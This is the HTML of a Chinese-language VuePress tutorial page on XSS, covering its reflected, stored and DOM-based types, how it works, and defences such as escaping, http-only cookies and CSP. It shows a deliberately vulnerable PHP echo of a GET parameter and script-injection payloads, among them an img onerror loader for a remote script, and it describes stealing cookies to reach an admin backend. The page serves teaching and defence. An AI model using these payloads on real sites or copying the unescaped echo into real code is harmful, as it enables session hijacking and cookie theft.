<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>XSS跨站脚本攻击 | 前端装逼大全</title>
    <meta name="generator" content="VuePress 1.8.2">
    
    <meta name="description" content="Just playing around">
    
    <link rel="preload" href="/vuepress-doc/assets/css/0.styles.f371e5c0.css" as="style"><link rel="preload" href="/vuepress-doc/assets/js/app.aa278e60.js" as="script"><link rel="preload" href="/vuepress-doc/assets/js/2.b009e2dd.js" as="script"><link rel="preload" href="/vuepress-doc/assets/js/33.4b7016fc.js" as="script"><link rel="prefetch" href="/vuepress-doc/assets/js/10.0856a168.js"><link rel="prefetch" href="/vuepress-doc/assets/js/11.282bfba7.js"><link rel="prefetch" href="/vuepress-doc/assets/js/12.3df55bf1.js"><link rel="prefetch" href="/vuepress-doc/assets/js/13.a9a8dfe0.js"><link rel="prefetch" href="/vuepress-doc/assets/js/14.7f1923e9.js"><link rel="prefetch" href="/vuepress-doc/assets/js/15.07ffd8af.js"><link rel="prefetch" href="/vuepress-doc/assets/js/16.f227e24c.js"><link rel="prefetch" href="/vuepress-doc/assets/js/17.6ea035f5.js"><link rel="prefetch" href="/vuepress-doc/assets/js/18.3f9b6600.js"><link rel="prefetch" href="/vuepress-doc/assets/js/19.8d967495.js"><link rel="prefetch" href="/vuepress-doc/assets/js/20.19c769ca.js"><link rel="prefetch" href="/vuepress-doc/assets/js/21.984e0b3c.js"><link rel="prefetch" href="/vuepress-doc/assets/js/22.c5a47b0b.js"><link rel="prefetch" href="/vuepress-doc/assets/js/23.14e82b9f.js"><link rel="prefetch" href="/vuepress-doc/assets/js/24.e94378a9.js"><link rel="prefetch" href="/vuepress-doc/assets/js/25.11d8299f.js"><link rel="prefetch" href="/vuepress-doc/assets/js/26.3e727ddc.js"><link rel="prefetch" href="/vuepress-doc/assets/js/27.0abe84de.js"><link rel="prefetch" href="/vuepress-doc/assets/js/28.5fe748f6.js"><link rel="prefetch" href="/vuepress-doc/assets/js/29.303b0d7b.js"><link rel="prefetch" href="/vuepress-doc/assets/js/3.766a0e10.js"><link rel="prefetch" href="/vuepress-doc/assets/js/30.70c544fb.js"><link rel="prefetch" href="/vuepress-doc/assets/js/31.9b041319.js"><link rel="prefetch" href="/vuepress-doc/assets/js/32.f23ea1a5.js"><link rel="prefetch" href="/vuepress-doc/assets/js/34.6eb381a8.js"><link rel="prefetch" href="/vuepress-doc/assets/js/35.7d0d3229.js"><link rel="prefetch" href="/vuepress-doc/assets/js/36.a427a68f.js"><link rel="prefetch" href="/vuepress-doc/assets/js/37.f6a924cb.js"><link rel="prefetch" href="/vuepress-doc/assets/js/38.3fb024a3.js"><link rel="prefetch" href="/vuepress-doc/assets/js/39.d7aa7a91.js"><link rel="prefetch" href="/vuepress-doc/assets/js/4.7adb1798.js"><link rel="prefetch" href="/vuepress-doc/assets/js/40.0ef745b8.js"><link rel="prefetch" href="/vuepress-doc/assets/js/41.6ace822a.js"><link rel="prefetch" href="/vuepress-doc/assets/js/42.50cd9e63.js"><link rel="prefetch" href="/vuepress-doc/assets/js/43.cf50106c.js"><link rel="prefetch" href="/vuepress-doc/assets/js/44.448d8e3c.js"><link rel="prefetch" href="/vuepress-doc/assets/js/45.97388d7d.js"><link rel="prefetch" href="/vuepress-doc/assets/js/5.d3359473.js"><link rel="prefetch" href="/vuepress-doc/assets/js/6.5eff19f1.js"><link rel="prefetch" href="/vuepress-doc/assets/js/7.8dbf1c37.js"><link rel="prefetch" href="/vuepress-doc/assets/js/8.3b48a8d2.js"><link rel="prefetch" href="/vuepress-doc/assets/js/9.e3474cec.js">
    <link rel="stylesheet" href="/vuepress-doc/assets/css/0.styles.f371e5c0.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="sidebar-button"><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" viewBox="0 0 448 512" class="icon"><path fill="currentColor" d="M436 124H12c-6.627 0-12-5.373-12-12V80c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12z"></path></svg></div> <a href="/vuepress-doc/" class="home-link router-link-active"><!----> <span class="site-name">前端装逼大全</span></a> <div class="links"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><div class="nav-item"><a href="/vuepress-doc/contents/Browser/对称加密与非对称加密.html" class="nav-link">
  Home
</a></div><div class="nav-item"><a href="/vuepress-doc/contents/Browser/对称加密与非对称加密.html" class="nav-link">
  Guide
</a></div><div class="nav-item"><a href="https://github.com/changjinyu0/vuepress-doc" target="_blank" rel="noopener noreferrer" class="nav-link external">
  External
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div> <!----></nav></div></header> <div class="sidebar-mask"></div> <aside class="sidebar"><nav class="nav-links"><div class="nav-item"><a href="/vuepress-doc/contents/Browser/对称加密与非对称加密.html" class="nav-link">
  Home
</a></div><div class="nav-item"><a href="/vuepress-doc/contents/Browser/对称加密与非对称加密.html" class="nav-link">
  Guide
</a></div><div class="nav-item"><a href="https://github.com/changjinyu0/vuepress-doc" target="_blank" rel="noopener noreferrer" class="nav-link external">
  External
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div> <!----></nav>  <ul class="sidebar-links"><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>Browser</span> <span class="arrow down"></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/vuepress-doc/contents/Browser/对称加密与非对称加密.html" class="sidebar-link">对称加密与非对称加密</a></li></ul></section></li></ul> </aside> <main class="page"> <div class="theme-default-content content__default"><h1 id="xss跨站脚本攻击"><a href="#xss跨站脚本攻击" class="header-anchor">#</a> XSS跨站脚本攻击</h1> <p>跨站脚本攻击<code>XSS</code>，是最普遍的<code>Web</code>应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中，当正常用户访问该页面时，则可导致嵌入的恶意脚本代码的执行，从而达到恶意攻击用户的目的。</p> <h2 id="类型"><a href="#类型" class="header-anchor">#</a> 类型</h2> <ul><li><p>反射型<code>XSS</code>： 攻击者事先制作好攻击链接,需要欺骗用户自己去点击链接才能触发<code>XSS</code>代码，所谓反射型<code>XSS</code>就是将恶意用户输入的<code>js</code>脚本，反射到浏览器执行。</p></li> <li><p>存储型<code>XSS</code>：代码是存储在服务器中的，如在个人信息或发表文章等地方，加入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，每当有用户访问该页面的时候都会触发代码执行，这种<code>XSS</code>非常危险，容易造成蠕虫，大量盗窃<code>cookie</code>，也被称为持久型<code>XSS</code>。</p></li> <li><p><code>DOM</code>型<code>XSS</code>：类似于反射型<code>XSS</code>，但这种<code>XSS</code>攻击的实现是通过对<code>DOM</code>树的修改而实现的。</p></li></ul> <h2 id="原理"><a href="#原理" class="header-anchor">#</a> 原理</h2> <p>当动态页面中插入的内容含有这些特殊字符如<code>&lt;</code>时，用户浏览器会将其误认为是插入了<code>HTML</code>标签，当这些<code>HTML</code>标签引入了一段<code>JavaScript</code>脚本时，这些脚本程序就将会在用户浏览器中执行。当这些特殊字符不能被动态页面检查或检查出现失误时，就将会产生<code>XSS</code>漏洞。</p> <p>攻击者可以使用户在浏览器中执行其预定义的恶意脚本，劫持用户会话，插入恶意内容、重定向链接、使用恶意软件劫持用户浏览器等等。</p> <p>基于反射型<code>XSS</code>漏洞，欺骗用户点击以执行<code>js</code>代码，可以盗取<code>cookie</code>等。</p> <div class="language-php line-numbers-mode"><pre class="language-php"><code>// 直接将输入打印到页面，造成XSS
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span> 
<span class="token variable">$XssReflex</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'i'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$XssReflex</span><span class="token punctuation">;</span>
</span></code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token comment">&lt;!-- 构造url，点击后就可以执行js代码 --&gt;</span>
http://127.0.0.1/xss.php?i=<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">&gt;</span></span><span class="token script"><span class="token language-javascript"><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">&quot;run javascript&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>基于存储型<code>XSS</code>漏洞，将<code>js</code>代码存储于服务器数据库中，服务器直接查询数据库数据显示到页面，即造成<code>XSS</code><br>
最经典的存储型<code>XSS</code>漏洞是留言板，当用户A在留言板留言一段<code>JS</code>代码<code>&lt;script&gt;alert(&quot;run javascript&quot;);&lt;/script&gt;</code>,后端未经过滤直接存储到数据库，当正常用户浏览到他的留言后，这段<code>JS</code>代码就会被执行，可以借此来盗取<code>cookie</code>。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>graph LR
恶意用户A --&gt; 构造JS代码
构造JS代码 --&gt; 服务器数据库
服务器数据库 --&gt; 正常用户B显示页面
服务器数据库 --&gt; 正常用户C显示页面
服务器数据库 --&gt; 正常用户...显示页面
正常用户B显示页面 --&gt; 执行js盗取cookie
正常用户C显示页面 --&gt; 执行js盗取cookie
正常用户...显示页面 --&gt; 执行js盗取cookie
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p>基于<code>DOM</code>的型<code>XSS</code>漏洞类似于反射型<code>XSS</code>，但其变化多端，总之一句话，各种姿势，各种插，只要能执行我的<code>Js</code>  ，利用<code>&lt;script&gt;</code>、<code>&lt;img&gt;</code>等标签允许跨域请求资源。<br>
经典案例是可以将标签写入到软件的意见反馈中，当管理员查看留言的反馈即触发<code>XSS</code>，传递<code>cookie</code>与后台管理地址后就可以登录到后台了。</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span> <span class="token attr-name">scr</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>js_url<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span><span class="token script"></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-html line-numbers-mode"><pre class="language-html"><code>&lt;img src=1 onerror=appendChild(createElement('script')).src='js_url' /&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="防御"><a href="#防御" class="header-anchor">#</a> 防御</h2> <ul><li>在用户提交参数前，将提交的字符<code>&lt;</code> 、<code>&gt;</code>、<code>&amp;</code>、<code>&quot;</code> 、<code>'</code> 、<code>+</code>、<code>/</code>等进行转义，严格控制输出。</li> <li>将输入转化为小写对比<code>javascript:</code>，若匹配则过滤。</li> <li>将<code>cookie</code>设置为<code>http-only</code>,<code>js</code>脚本将无法读取到<code>cookie</code>信息。</li> <li>纯前端渲染，明确<code>innerText</code>、<code>setAttribute</code>、<code>style</code>，将代码与数据分隔开。</li> <li>避免不可信的数据拼接到字符串中传递给这些<code>API</code>，如<code>DOM</code>中的内联事件监听器，<code>location</code>、<code>onclick</code>、<code>onerror</code>、<code>onload</code>、<code>onmouseover</code>等，<code>&lt;a&gt;</code>标签的<code>href</code>属性，<code>JavaScript</code>的<code>eval()</code>、<code>setTimeout()</code>、<code>setInterval()</code>等，都能把字符串作为代码运行。</li> <li>对于不受信任的输入，都应该限定一个合理的长度。</li> <li>严格的<code>CSP</code>,禁止加载外域代码，禁止外域提交，禁止内联脚本执行等较为严格的方式。</li></ul> <h2 id="每日一题"><a href="#每日一题" class="header-anchor">#</a> 每日一题</h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>https://github.com/WindrunnerMax/EveryDay
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div></div> <footer class="page-edit"><!----> <!----></footer> <!----> </main></div><div class="global-ui"></div></div>
    <script src="/vuepress-doc/assets/js/app.aa278e60.js" defer></script><script src="/vuepress-doc/assets/js/2.b009e2dd.js" defer></script><script src="/vuepress-doc/assets/js/33.4b7016fc.js" defer></script>
  </body>
</html>
